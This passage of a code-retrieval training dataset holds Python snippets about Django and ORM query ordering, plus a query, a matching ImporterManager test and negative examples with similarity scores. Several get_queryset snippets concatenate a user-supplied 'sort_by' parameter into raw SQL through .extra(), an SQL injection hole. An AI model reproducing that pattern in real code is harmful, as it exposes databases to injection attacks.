self).get_queryset()\n if self.request.GET.get(\"ordering\") is None:\n rs = rs.order_by(\"id\")\n return rs", "def get_sort_by(self) -> SortField:\n if hasattr(self, \"json\") and isinstance(self.json, dict):\n sort_by_str = self.json.get(\"sort_by\", \"relevance\")\n if SortField.is_sort_field(sort_by_str):\n return SortField.from_str(sort_by_str)\n return SortField.relevance", "def __order_queryset(self, queryset):\n if self.get_paginate_by(queryset) and \\\n self.request.method == \"POST\" and self.__has_initially_selected_items():\n current_order_by = list(queryset.query.order_by)\n whenqueries = []\n max_index = 0\n for index, value in enumerate(self.get_selected_values_queryset().order_by(*current_order_by)):\n whenqueries.append(models.When(pk=value.pk, then=models.Value(index)))\n max_index = index\n queryset = queryset.annotate(\n cradmin_multiselect2_ordering=models.Case(\n *whenqueries,\n default=max_index + 1,\n output_field=models.IntegerField()\n )\n )\n order_by = ['cradmin_multiselect2_ordering']\n order_by.extend(current_order_by)\n queryset = queryset.order_by(*order_by)\n return queryset", "def order_by(self, *args):\n order_clauses = self.order_clauses[:]\n related_clauses = self.related_clauses[:]\n model = self.proxy.model\n for arg in args:\n if isinstance(arg, str):\n # Convert django-style to sqlalchemy ordering column\n if arg[0] == '-':\n field = arg[1:]\n ascending = False\n else:\n field = arg\n ascending = True\n\n col = resolve_member_column(model, field, related_clauses)\n\n if ascending:\n clause = col.asc()\n else:\n clause = col.desc()\n else:\n clause = arg\n if clause not in order_clauses:\n order_clauses.append(clause)\n return self.clone(order_clauses=order_clauses,\n related_clauses=related_clauses)", "def order_by(self):\r\n if self.column.order_by is not None:\r\n order_by = self.column.order_by\r\n else:\r\n # default to using column accessor as data source sort key\r\n order_by = OrderByTuple((self.accessor, ))\r\n return order_by.opposite if self.order_by_alias.is_descending else order_by", "def post_sort(self, qs):\n return qs", "def get_queryset(self):\n\n qs = super().get_queryset() # get company specific queryset\n\n filters = dict(self.request.GET.lists()) # dictionary of lists\n\n # pull out order_by and order\n order_by = filters.pop(\"order_by\", None)\n order = filters.pop(\"order\", None)\n\n # Ordering by JSON field taken from\n # https://stackoverflow.com/questions/36641759/django-1-9-jsonfield-order-by\n # Jan 2, 2018\n\n if order_by:\n if order:\n pass\n # TODO: Figure out what can be done for ordering...\n\n else:\n qs = qs.order_by(\"-id\") # default to descending id order\n\n for exp_filter in filters:\n try:\n qs = self.FILTERS[exp_filter](qs, filters[exp_filter])\n except KeyError:\n pass\n # do nothing if not a filter\n\n return qs", "def filter_queryset(self, qs):\n qs = super(ReleaseViewSet, self).filter_queryset(qs)\n if getattr(self, 'order_queryset', False):\n return sorted(qs, key=models.Release.version_sort_key)\n return qs", "def order_queryset_by_sort_order(get, qs):\n\n def get_string_from_tuple_list(lstTuples, number):\n \"\"\"Get the string value corresponding to a number in a list of number-string tuples\"\"\"\n sBack = [tup[1] for tup in lstTuples if tup[0] == number]\n return sBack\n\n # Helper: order a queryset on field [sOrder], which is a number from a list of tuples named [sListName]\n def order_queryset_by_tuple_list(qs, sOrder, sListName):\n \"\"\"Order a queryset on field [sOrder], which is a number from a list of tuples named [sListName]\"\"\"\n\n # Get a list of tuples for this sort-order\n tpList = build_choice_list(sListName)\n # Determine sort order: ascending is default\n bReversed = False\n if (sOrder[0:1] == '-'):\n # A starting '-' sign means: descending order\n sOrder = sOrder[1:]\n bReversed = True\n\n # Order the list of tuples alphabetically\n # (NOTE: they are alphabetical from 'build_choice_list()', except for the values 0,1)\n tpList = sorted(tpList, key=operator.itemgetter(1))\n # Order by the string-values in the tuple list\n return sorted(qs, key=lambda x: get_string_from_tuple_list(tpList, getattr(x, sOrder)), reverse=bReversed)\n\n # Set the default sort order\n sOrder = 'woord' # Default sort order if nothing is specified\n # See if the form contains any sort-order information\n if ('sortOrder' in get and get['sortOrder'] != ''):\n # Take the user-indicated sort order\n sOrder = get['sortOrder']\n\n # The ordering method depends on the kind of field:\n # (1) text fields are ordered straightforwardly\n # (2) fields made from a choice_list need special treatment\n if (sOrder.endswith('handedness')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Handedness\")\n elif (sOrder.endswith('domhndsh') or sOrder.endswith('subhndsh')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Handshape\")\n elif (sOrder.endswith('locprim')):\n ordered = order_queryset_by_tuple_list(qs, sOrder, \"Location\")\n else:\n # Use straightforward ordering on field [sOrder]\n ordered = qs.order_by(sOrder)\n\n # return the ordered list\n return ordered", "def get_queryset(self):\n search_str = self.request.GET.get('search')\n col_nm = self.request.GET.get('sort_by', \"name\")\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', \"ASC\")\n self.sort_ordr=sort_order\n\n if search_str:\n search_str = self.request.GET.get('search', None)\n a = Q(name__icontains=search_str)\n b = Q(administrator__first_name__icontains = search_str)\n c = Q(administrator__last_name__icontains = search_str)\n d = Q(administrator__username__icontains = search_str)\n e = Q(types__name__icontains = search_str)\n f = Q(description__icontains = search_str)\n objects = Organization.objects.filter(a | b | c | d | e | f).distinct()\n\n else: # SORTING BY COL_NM\n if col_nm in ['name', 'description'] :\n objects = Organization.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n elif col_nm =='administrator__first_name':\n objects=Organization.objects.filter().order_by(col_nm)\n if sort_order == \"DESC\":\n objects = objects.reverse()\n else:\n objects=Organization.objects.extra(select=\n {'name':'lower(name)'}).order_by('name')\n\n\n return objects", "def get_queryset(self, request):\n queryset = self.model._default_manager.all()\n queryset = queryset.filter(user=request.user)\n ordering = self.get_ordering()\n if ordering:\n if isinstance(ordering, str):\n ordering = (ordering,)\n queryset = queryset.order_by(*ordering)\n return queryset", "def test_relatedfieldlistfilter_foreignkey_default_ordering(self):\n\n class BookAdmin(ModelAdmin):\n list_filter = (\"employee\",)\n\n self.addCleanup(setattr, Employee._meta, \"ordering\", Employee._meta.ordering)\n Employee._meta.ordering = (\"name\",)\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(self.jack.pk, \"Jack Red\"), (self.john.pk, \"John Blue\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def test_entities__Entity__setFieldOrder__2(entity_with_field):\n entity = entity_with_field\n entity.setFieldOrder(['dummy2', 'I-do-not-exist', 'dummy'])\n assert ['dummy2', 'dummy'] == entity.getFieldOrder()\n # Unknown field names are not written into storage:\n order_storage = zope.component.getUtility(IOrderStorage)\n assert (['dummy2', 'dummy'] ==\n order_storage.byNamespace(entity.order_storage_namespace))", "def test_entities__Entity__setFieldOrder__1(entity_with_field, field):\n assert [] == entity_with_field.getFieldOrder()\n entity_with_field.setFieldOrder(['dummy2', field.__name__, 'dummy'])\n assert (['dummy2', field.__name__, 'dummy'] ==\n entity_with_field.getFieldOrder())", "def test_relatedonlyfieldlistfilter_foreignkey_default_ordering(self):\n\n class BookAdmin(ModelAdmin):\n list_filter = ((\"employee\", RelatedOnlyFieldListFilter),)\n\n albert = Employee.objects.create(name=\"Albert Green\", department=self.dev)\n self.djangonaut_book.employee = albert\n self.djangonaut_book.save()\n self.bio_book.employee = self.jack\n self.bio_book.save()\n\n self.addCleanup(setattr, Employee._meta, \"ordering\", Employee._meta.ordering)\n Employee._meta.ordering = (\"name\",)\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(albert.pk, \"Albert Green\"), (self.jack.pk, \"Jack Red\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def _get_order_by(order, orderby, order_by_fields):\n try:\n # Find the actual database fieldnames for the keyword.\n db_fieldnames = order_by_fields[orderby]\n except KeyError:\n raise ValueError(\n \"Invalid value for 'orderby': '{}', supported values are: {}\".format(\n orderby, \", \".join(sorted(order_by_fields.keys()))\n )\n )\n\n # Default to descending for some fields, otherwise be ascending\n is_desc = (not order and orderby in ORDER_BY_DESC) or (order or \"asc\").lower() in (\n \"desc\",\n \"descending\",\n )\n\n if is_desc:\n return map(lambda name: \"-\" + name, db_fieldnames)\n else:\n return db_fieldnames", "def get_ordering(self, request, queryset, view):\n ordering = []\n params = get_datatables_ordering(request.query_params)\n if params:\n fields = [param.strip() for param in params.split(',')]\n ordering = self.remove_invalid_fields(queryset, fields, view, request)\n if ordering:\n return ordering\n\n # No ordering was included, or all the ordering fields were invalid\n return self.get_default_ordering(view)", "def set_sorting_enabled(self, value):\n self.tableWidget.setSortingEnabled(value)", "def sort(self, column, order=Qt.AscendingOrder):\n if(column == Columns.Date):\n self.sorting = Sorting.Date\n elif(column == Columns.Code):\n self.sorting = Sorting.Code\n elif(column == Columns.User):\n self.sorting = Sorting.User\n elif(column == Columns.Tags):\n self.sorting = Sorting.Priviledges\n elif(column == Columns.TimesRequested):\n self.sorting = Sorting.TimesRequested\n\n if(order == Qt.DescendingOrder):\n self.sorting |= Sorting.Reversed\n\n self._reset_view()", "def _apply_order_by_and_limit(objects, order_by=None, limit=None):\n if order_by:\n try:\n # Note: currently we sort only by the first column from the list\n order_by = order_by[0]\n order_field = order_by[\"name\"]\n order_desc = order_by.get(\"desc\", False)\n objects = sorted(\n objects,\n key=lambda obj: getattr(obj, order_field),\n reverse=order_desc,\n )\n except:\n raise BadQueryException(\"Bad query: Invalid 'order_by' parameter\")\n\n if limit:\n try:\n from_, to_ = limit\n objects = objects[from_: to_]\n except:\n raise BadQueryException(\"Bad query: Invalid 'limit' parameter.\")\n\n return objects", "def test_entities__Entity__getFieldOrder__2(entity_with_field, field):\n entity = entity_with_field\n entity.setFieldOrder([field.__name__, 'dummy'])\n assert [field.__name__, 'dummy'] == entity.getFieldOrder()", "def test_order_by(self):\n self.Person(name=\"User B\", age=40).save()\n self.Person(name=\"User A\", age=20).save()\n self.Person(name=\"User C\", age=30).save()\n\n names = [p.name for p in self.Person.objects.order_by(\"-age\")]\n assert names == [\"User B\", \"User C\", \"User A\"]\n\n names = [p.name for p in self.Person.objects.order_by(\"+age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n names = [p.name for p in self.Person.objects.order_by(\"age\")]\n assert names == [\"User A\", \"User C\", \"User B\"]\n\n ages = [p.age for p in self.Person.objects.order_by(\"-name\")]\n assert ages == [30, 40, 20]\n\n ages = [p.age for p in self.Person.objects.order_by()]\n assert ages == [40, 20, 30]\n\n ages = [p.age for p in self.Person.objects.order_by(\"\")]\n assert ages == [40, 20, 30]", "def queryset(self, ordering=None):\r\n qs = self.model._default_manager.get_query_set()\r\n if not ordering:\r\n ordering = self.ordering or () # otherwise we might try to *None, which is bad ;)\r\n if ordering:\r\n qs = qs.order_by(*ordering)\r\n return qs", "def sort(self, *order_fields):\n return MockSearch(\n self, self._query, self.nested_filter_calls, order_fields,\n self._script_fields\n )", "def order_by(self, aliases):\r\n accessors = []\r\n for alias in aliases:\r\n bound_column = self.table.columns[OrderBy(alias).bare]\r\n # bound_column.order_by reflects the current ordering applied to\r\n # the table. As such we need to check the current ordering on the\r\n # column and use the opposite if it doesn't match the alias prefix.\r\n if alias[0] != bound_column.order_by_alias[0]:\r\n accessors += bound_column.order_by.opposite\r\n else:\r\n accessors += bound_column.order_by\r\n if hasattr(self, \"queryset\"):\r\n translate = lambda accessor: accessor.replace(Accessor.SEPARATOR, QUERYSET_ACCESSOR_SEPARATOR)\r\n self.queryset = self.queryset.order_by(*(translate(a) for a in accessors))\r\n else:\r\n self.list.sort(key=OrderByTuple(accessors).key)", "def get_queryset(self):\n\n search_str = self.request.GET.get('search', None)\n col_nm = self.request.GET.get('sort_by', \"name\")\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', \"ASC\")\n self.sort_ordr=sort_order\n if search_str:\n a = Q(name__icontains = search_str)\n b = Q(description__icontains = search_str)\n objects = self.model.objects.filter(a | b).distinct()\n\n else:\n objects = OrganizationType.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n return objects", "def sortby(self):\n return self._sortby", "def order_query(self, query):\n\n direction = desc if self.direction == 'desc' else asc\n if self.order in inspect(self.model_class).columns.keys():\n attribute = getattr(self.model_class, self.order)\n elif self.order == 'group.name':\n attribute = func.coalesce(UserGroup.name, '')\n elif self.order == 'user.realname':\n attribute = func.coalesce(User.realname, '')\n elif self.order == 'user.username':\n attribute = func.coalesce(User.username, '')\n elif self.order == 'user.name':\n attribute = func.coalesce(User.realname, User.username, '')\n else:\n attribute = self.model_class.first_issue\n\n return query.order_by(None).order_by(direction(attribute))", "def _sort_by_query_string_param(self, songs):\n orderable_fields_dict = {\n 'name': Lower('name'),\n 'artist': Lower('artist__name'),\n 'avgRating': 'average_rating',\n 'year': 'year'\n }\n\n order_by = self.request.query_params.get('orderBy', None)\n\n if order_by is not None and order_by in orderable_fields_dict:\n order_field = orderable_fields_dict[order_by]\n\n # sort in direction indicated by `direction` query string param\n # or ascending, by default\n direction = self.request.query_params.get('direction', 'asc')\n if direction == 'desc':\n if order_by == 'name' or order_by == 'artist':\n order_field = order_field.desc()\n else:\n order_field = '-' + order_field\n\n # add annotation for average_rating to sort by computed property\n if order_by == 'avgRating':\n songs = songs.annotate(\n average_rating=Avg('ratings__rating')\n )\n\n songs = songs.order_by(order_field)\n\n return songs", "def sort_from_request(request):\n order = request.args.get('order_by')\n if order:\n key, direction = order.split(',')\n reverse = False if direction == 'ASC' else True\n return Sort(key, reverse)\n else:\n return Sort(None)", "def validate_sort_order(filter, main_field):\n\n # The tiebreaker fields are always in the same order, but\n # if the main sort field is one of the tiebreaker fields,\n # it's removed from the list -- there's no need to sort on\n # that field a second time.\n default_sort_fields = [\n {x: \"asc\"} for x in ['sort_author', 'sort_title', 'work_id']\n if x != main_field\n ]\n assert default_sort_fields == filter.sort_order[1:]\n return filter.sort_order[0]", "def test_relatedfieldlistfilter_foreignkey_ordering(self):\n\n class EmployeeAdminWithOrdering(ModelAdmin):\n ordering = (\"name\",)\n\n class BookAdmin(ModelAdmin):\n list_filter = (\"employee\",)\n\n site.register(Employee, EmployeeAdminWithOrdering)\n self.addCleanup(lambda: site.unregister(Employee))\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(self.jack.pk, \"Jack Red\"), (self.john.pk, \"John Blue\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def _orderby_expression(self):\n return ''", "def order_by(cls, *args):\n return cls.query.order_by(*args)", "def order_by(self, column, direction=\"ASC\"):\n self._order_by += ((column, direction),)\n return self", "def add_sort(self, field_name, ascending=True):\n if not self._query_is_empty():\n self.query.AND()\n if ascending:\n logger.info(\"Sorting records by {} in ascending order.\".format(field_name))\n self.query.field(field_name.lower()).order_ascending() # lowercase for convenience\n logger.debug(\"sysparm_query contains: {q}\".format(q=self.query._query))\n else:\n logger.info(\"Sorting records by {} in descending order.\".format(field_name))\n self.query.field(field_name.lower()).order_descending()\n logger.debug(\"sysparm_query contains: {q}\".format(q=self.query._query))", "def get_query_set(model_class, sort_column=\"id\", sort_descending=True, filters={}): \n sort_modifier = \"\"\n if sort_descending:\n sort_modifier = \"-\"\n return model_class.objects.filter(**filters).order_by(\"%s%s\"% (sort_modifier, sort_column))", "def test_relatedonlyfieldlistfilter_foreignkey_ordering(self):\n\n class EmployeeAdminWithOrdering(ModelAdmin):\n ordering = (\"name\",)\n\n class BookAdmin(ModelAdmin):\n list_filter = ((\"employee\", RelatedOnlyFieldListFilter),)\n\n albert = Employee.objects.create(name=\"Albert Green\", department=self.dev)\n self.djangonaut_book.employee = albert\n self.djangonaut_book.save()\n self.bio_book.employee = self.jack\n self.bio_book.save()\n\n site.register(Employee, EmployeeAdminWithOrdering)\n self.addCleanup(lambda: site.unregister(Employee))\n modeladmin = BookAdmin(Book, site)\n\n request = self.request_factory.get(\"/\")\n request.user = self.alfred\n changelist = modeladmin.get_changelist_instance(request)\n filterspec = changelist.get_filters(request)[0][0]\n expected = [(albert.pk, \"Albert Green\"), (self.jack.pk, \"Jack Red\")]\n self.assertEqual(filterspec.lookup_choices, expected)", "def on_combo_sort_col_names_currentIndexChanged(self, index):\n if self.ui.sort_radio_asc.isChecked():\n self.model.setSort(index, Qt.AscendingOrder)\n else:\n self.model.setSort(index, Qt.DescendingOrder)\n self.model.select()", "def order_by_alias(self):\r\n order_by = OrderBy((self.table.order_by or {}).get(self.name, self.name))\r\n order_by.next = order_by.opposite if self.is_ordered else order_by\r\n return order_by", "def update_order_property_setter(self, has_custom, fieldname):\n\t\tproperty_name = f\"{fieldname}_order\"\n\t\tif has_custom:\n\t\t\t# save the order of the actions and links\n\t\t\tself.make_property_setter(\n\t\t\t\tproperty_name, json.dumps([d.name for d in self.get(fieldname)]), \"Small Text\"\n\t\t\t)\n\t\telse:\n\t\t\tfrappe.db.delete(\"Property Setter\", dict(property=property_name, doc_type=self.doc_type))", "def set_sort_order(self, sort_order):\n\n\t\tif sort_order is not None and not isinstance(sort_order, str):\n\t\t\traise SDKException(Constants.DATA_TYPE_ERROR, 'KEY: sort_order EXPECTED TYPE: str', None, None)\n\t\t\n\t\tself.__sort_order = sort_order\n\t\tself.__key_modified['sort_order'] = 1", "def changeOrder(self):\n order = self.orderSpinBox.value()\n nfilter = int(str(self.filterComboBox.currentText()))\n if order > nfilter - 2:\n order = nfilter - 2\n if order < 1:\n order = 1\n self.orderSpinBox.setValue(order)\n self.order = order", "def order_by(self, *colnames):\r\n if len(colnames) == 0:\r\n clone = copy.deepcopy(self)\r\n clone._order = []\r\n return clone\r\n\r\n conditions = []\r\n for colname in colnames:\r\n conditions.append('\"{}\" {}'.format(*self._get_ordering_condition(colname)))\r\n\r\n clone = copy.deepcopy(self)\r\n clone._order.extend(conditions)\r\n return clone", "def resolve_orderby(self, orderby: Optional[Union[List[str], str]]) -> List[OrderBy]:\n validated: List[OrderBy] = []\n\n if orderby is None:\n return validated\n\n if isinstance(orderby, str):\n if not orderby:\n return validated\n\n orderby = [orderby]\n\n orderby_columns: List[str] = orderby if orderby else []\n\n resolved_orderby: Union[str, SelectType, None]\n for orderby in orderby_columns:\n bare_orderby = orderby.lstrip(\"-\")\n bare_orderby = self.tag_to_prefixed_map.get(bare_orderby, bare_orderby)\n try:\n # Allow ordering equations with the calculated alias (ie. equation[0])\n if is_equation_alias(bare_orderby):\n resolved_orderby = bare_orderby\n # Allow ordering equations directly with the raw alias (ie. equation|a + b)\n elif is_equation(bare_orderby):\n resolved_orderby = self.equation_alias_map[strip_equation(bare_orderby)]\n bare_orderby = resolved_orderby.alias\n else:\n resolved_orderby = self.resolve_column(bare_orderby)\n except (NotImplementedError, IncompatibleMetricsQuery):\n resolved_orderby = None\n\n direction = Direction.DESC if orderby.startswith(\"-\") else Direction.ASC\n\n if fields.is_function(bare_orderby) and (\n isinstance(resolved_orderby, Function)\n or isinstance(resolved_orderby, CurriedFunction)\n or isinstance(resolved_orderby, AliasedExpression)\n ):\n bare_orderby = resolved_orderby.alias\n\n for selected_column in self.columns:\n if isinstance(selected_column, Column) and selected_column == resolved_orderby:\n validated.append(OrderBy(selected_column, direction))\n break\n elif (\n isinstance(selected_column, AliasedExpression)\n and selected_column.alias == bare_orderby\n ):\n if bare_orderby in self.orderby_converter:\n validated.append(self.orderby_converter[bare_orderby](direction))\n break\n # We cannot directly order by an `AliasedExpression`.\n # Instead, we order by the column inside.\n validated.append(OrderBy(selected_column.exp, direction))\n break\n\n elif (\n isinstance(selected_column, CurriedFunction)\n and selected_column.alias == bare_orderby\n ):\n if bare_orderby in self.orderby_converter:\n validated.append(self.orderby_converter[bare_orderby](direction))\n validated.append(OrderBy(selected_column, direction))\n break\n\n if len(validated) == len(orderby_columns):\n return validated\n\n # TODO: This is no longer true, can order by fields that aren't selected, keeping\n # for now so we're consistent with the existing functionality\n raise InvalidSearchQuery(\"Cannot sort by a field that is not selected.\")", "def get_paginate_by(self, queryset):\n return self.request.GET.get('paginate_by', self.paginate_by)", "def get_queryset(self):\n search_str = self.request.GET.get('search', None)\n col_nm = self.request.GET.get('sort_by', 'title')\n self.temp=col_nm\n sort_order = self.request.GET.get('sort_order', 'ASC')\n self.sort_ordr=sort_order\n if search_str:\n search_str = self.request.GET.get('search', None)\n a = Q(title__icontains = search_str)\n b = Q(description__icontains = search_str)\n objects = Designation.objects.filter(a | b).distinct()\n else: # SORTING BY COL_NM\n objects = Designation.objects.filter().extra(\n select = {col_nm:'lower('+col_nm+')'}).order_by(col_nm)\n\n if sort_order == \"DESC\":\n objects = objects.reverse()\n return objects", "def get_default_paginate_by(self, queryset):\n return self.paginate_by", "def get_queryset(self):\n queryset = super(viewsets.ModelViewSet, self).get_queryset().order_by('first_name')\n\n if self.request.GET.get('q', None):\n return queryset.filter(username__icontains=self.request.GET['q'])\n return queryset", "def __init__(\n self,\n queryset,\n per_page=25,\n ordering=\"pk\",\n allow_count=False,\n allow_empty_first_page=True,\n orphans=0,\n ):\n self.queryset = queryset\n self.per_page = int(per_page)\n self.ordering = ordering\n self.allow_count = allow_count\n\n field = ordering.replace(\"-\", \"\")\n self._reverse_ordering = field if ordering[0] == \"-\" else \"-{0}\".format(ordering)\n self._field = field", "def sort_field():\n _id = request.form['_id']\n old_index = request.form['old_index']\n new_index = request.form['new_index']\n data, code, message = FIELD_SERVICE.sort_field(_id, old_index, new_index)\n return __result(data, code, message)", "def sort(self, field='word', order=None):\n self.data = list(self.sorted(field, order))", "def order_by(self, *orderings):\n return OrderedQuery(self, orderings)", "def ordered(self):\n if isinstance(self, EmptyQuerySet):\n return True\n if self.query.extra_order_by or self.query.order_by:\n return True\n elif (\n self.query.default_ordering\n and self.query.get_meta().ordering\n and\n # A default ordering doesn't affect GROUP BY queries.\n not self.query.group_by\n ):\n return True\n else:\n return False", "def order_by(self, *fields):\n doc = []\n for field in fields:\n if field.startswith('-'):\n doc.append((field.strip('-'), pymongo.DESCENDING))\n else:\n doc.append((field, pymongo.ASCENDING))\n return self.sort(doc)", "def pre_filter(self, qs):\n return qs", "def test_shelflistitem_view_orderby(order_by, api_settings, shelflist_solr_env,\n get_shelflist_urls, api_client):\n sl_urls = get_shelflist_urls(shelflist_solr_env.records['shelflistitem'])\n test_url = '{}?orderBy={}'.format(sl_urls.values()[0], order_by)\n response = api_client.get(test_url)\n assert response.status_code == 400\n assert 'not a valid field for ordering' in response.data['detail']", "def sort_on(self):\n if \"sortOn\" in self._prop_dict:\n return self._prop_dict[\"sortOn\"]\n else:\n return None", "def list(self, request, *args, **kwargs):\n self.order_queryset = True\n if 'ordering' in request.query_params.keys():\n self.order_queryset = False\n return super(ReleaseViewSet, self).list(request, *args, **kwargs)", "def queryset(self, request):\n qs = self.model.all_objects.get_query_set()\n ordering = self.ordering or ()\n if ordering:\n qs = qs.order_by(*ordering)\n return qs", "def setSearchFieldnames(self, fieldnames):\n self._search_fieldnames = fieldnames", "def sort_order(self, sort_order):\n\n self._sort_order = sort_order", "def setFieldNames(self, model, lyr): \n #get the fields\n fields = lyr.pendingFields()\n position = 0\n \n #set column names\n for field in fields:\n model.setHorizontalHeaderItem(position, QStandardItem(field.name()))\n position+=1", "def get_queryset(self, request):\n querys = self.model.all_objects.get_queryset()\n ordering = self.get_ordering(request)\n if ordering:\n querys = querys.order_by(*ordering)\n return querys", "def default_sort_column(self, default_sort_column):\n\n self._default_sort_column = default_sort_column", "def get_sort_query(self, kind, order, is_number):\n pass", "def testSortNoDbAscending(self):\n self.request.GET['sort'] = \"custom\"\n self.datagrid.load_state()\n self.assertEqual(self.datagrid.sort_list, [\"custom\"])\n self.assertEqual(len(self.datagrid.rows), self.datagrid.paginate_by)\n self.assertEqual(self.datagrid.rows[0]['object'].name, \"Group 04\")\n self.assertEqual(self.datagrid.rows[1]['object'].name, \"Group 08\")\n self.assertEqual(self.datagrid.rows[2]['object'].name, \"Group 12\")\n\n # Exercise the code paths when rendering\n self.datagrid.render_listview()", "def order_by_as_sql(self):\n return comma_join([\n '%s DESC' % field[1:] if isinstance(field, str) and field[0] == '-' else str(field)\n for field in self._order_by\n ])", "def order_by(self, list_or_name):\n if not isinstance(list_or_name, basestring):\n for c in list_or_name:\n self.order_by(c)\n else:\n self._orderby_conds.append(list_or_name)\n\n return self" ]
[ "0.7341014", "0.7114981", "0.65821075", "0.6384245", "0.6316189", "0.6254384", "0.6160399", "0.60926193", "0.59577346", "0.59503293", "0.59400135", "0.5909272", "0.5759706", "0.57583076", "0.57493776", "0.5726326", "0.5716653", "0.571355", "0.5712792", "0.5647503", "0.5642596", "0.5628735", "0.56165737", "0.55814326", "0.55741805", "0.55557436", "0.5532448", "0.5529606", "0.5519835", "0.5511644", "0.5485929", "0.5465671", "0.54204506", "0.5419675", "0.54087925", "0.5402096", "0.5371906", "0.53660154", "0.53618526", "0.5359104", "0.5352894", "0.5334281", "0.5329987", "0.5329112", "0.5325092", "0.53136086", "0.5311685", "0.5303327", "0.5302453", "0.52917993", "0.52610624", "0.52568024", "0.52540207", "0.52511346", "0.522411", "0.52015024", "0.51937896", "0.5186127", "0.51592165", "0.5133022", "0.5132554", "0.510349", "0.50978875", "0.509699", "0.5087841", "0.5079201", "0.5072474", "0.5072194", "0.5070364", "0.5067101", "0.5014353", "0.5012664", "0.50006074", "0.49766332", "0.49702168", "0.49586567", "0.495488", "0.49414554", "0.49271742", "0.49263468", "0.49259594", "0.49211022", "0.49133986", "0.48979747", "0.48888963", "0.48784864", "0.48675054", "0.48620343", "0.48601866", "0.4846724", "0.48267564", "0.48263326", "0.48251227", "0.48155618", "0.48122683", "0.4795051", "0.47769246", "0.47763884", "0.47747236", "0.4774328" ]
0.6805322
2
Given object without dependency, use it's importerManager to get available data
def test_nondependent_object_get(self): manager = ImporterManager(importer=UserImporter()) for row,name in enumerate(self.usernames): manager.update_kvs(field_name='username',value=name,row=row) manager.get_available_rows() for i in range(self.n_objs): objs: List[RecordData] = manager.get_objs_and_meta(i) #: Returns a list of objects only if manytomany self.assertEqual(objs[0].available, True) self.assertIsNotNone(objs[0].object) self.assertIsInstance(objs[0].object, User) self.assertIsNotNone(objs[0].query) del manager
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def importer():\n pass", "def get_objects_data(self):\n pass", "def import_(self, data):\n return self.__import(data)", "def import_data(self):\n self.models = []\n for o in self.loader.load():\n klass = self.type_for(o)\n if hasattr(klass, \"from_api\"):\n self.models.append(klass.from_api(o))\n else:\n self.models.append(klass(o))\n return self.models", "def object_import(request, simulation, object_name):\n try:\n if object_name == 'function':\n parent = simulation.scenario.supply.functionset\n else:\n parent = simulation.scenario.supply.network\n query = get_query(object_name, simulation)\n user_id_set = set(query.values_list('user_id', flat=True))\n if object_name == 'link':\n # To import links, we retrieve the user ids of all centroids, crossings\n # and functions and we build mappings between ids and objects.\n centroids = get_query('centroid', simulation)\n centroid_ids = set(centroids.values_list('user_id', flat=True))\n crossings = get_query('crossing', simulation)\n crossing_ids = set(crossings.values_list('user_id', flat=True))\n node_ids = centroid_ids.union(crossing_ids)\n # Mapping between the user id and the id of the nodes.\n node_mapping = dict()\n for centroid in centroids:\n node_mapping[centroid.user_id] = centroid.id\n for crossing in crossings:\n node_mapping[crossing.user_id] = crossing.id\n functions = get_query('function', simulation)\n function_ids = set(functions.values_list('user_id', flat=True))\n # Mapping between the user id and the id of the functions.\n function_id_mapping = dict()\n # Mapping between the user id and the instance of the functions\n function_mapping = dict()\n for function in functions:\n function_id_mapping[function.user_id] = function.id\n function_mapping[function.user_id] = function\n # Convert imported file to a csv DictReader.\n encoded_file = request.FILES['import_file']\n tsv_file = StringIO(encoded_file.read().decode())\n reader = csv.DictReader(tsv_file, delimiter='\\t')\n to_be_updated = set()\n to_be_created = list()\n # Store the user_id of the imported instance to avoid two instances\n # with the same id.\n imported_ids = set()\n if object_name == 'centroid':\n # Do not import centroid with same id as a crossing.\n crossings = get_query('crossing', simulation)\n imported_ids = set(crossings.values_list('user_id', flat=True))\n for row in reader:\n id = int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'], float(row['x']),\n float(row['y']))\n )\n else:\n to_be_created.append(\n Centroid(user_id=id, name=row['name'],\n x=float(row['x']), y=float(row['y']))\n )\n elif object_name == 'crossing':\n # Do not import crossing with same id as a centroid.\n centroids = get_query('centroid', simulation)\n imported_ids = set(centroids.values_list('user_id', flat=True))\n for row in reader:\n id = int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'], float(row['x']),\n float(row['y']))\n )\n else:\n to_be_created.append(\n Crossing(user_id=id, name=row['name'],\n x=float(row['x']), y=float(row['y']))\n )\n elif object_name == 'function':\n for row in reader:\n id = int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'], row['expression'])\n )\n else:\n to_be_created.append(\n Function(user_id=id, name=row['name'],\n expression=row['expression'])\n )\n elif object_name == 'link':\n for row in reader:\n id = int(row['id'])\n if not id in imported_ids:\n imported_ids.add(id)\n if id in user_id_set:\n to_be_updated.add(\n (id, row['name'],\n node_mapping[int(row['origin'])],\n node_mapping[int(row['destination'])],\n function_id_mapping[int(row['function'])],\n float(row['lanes']), float(row['length']),\n float(row['speed']), float(row['capacity']))\n )\n else:\n if int(row['origin']) in node_ids \\\n and int(row['destination']) in node_ids \\\n and 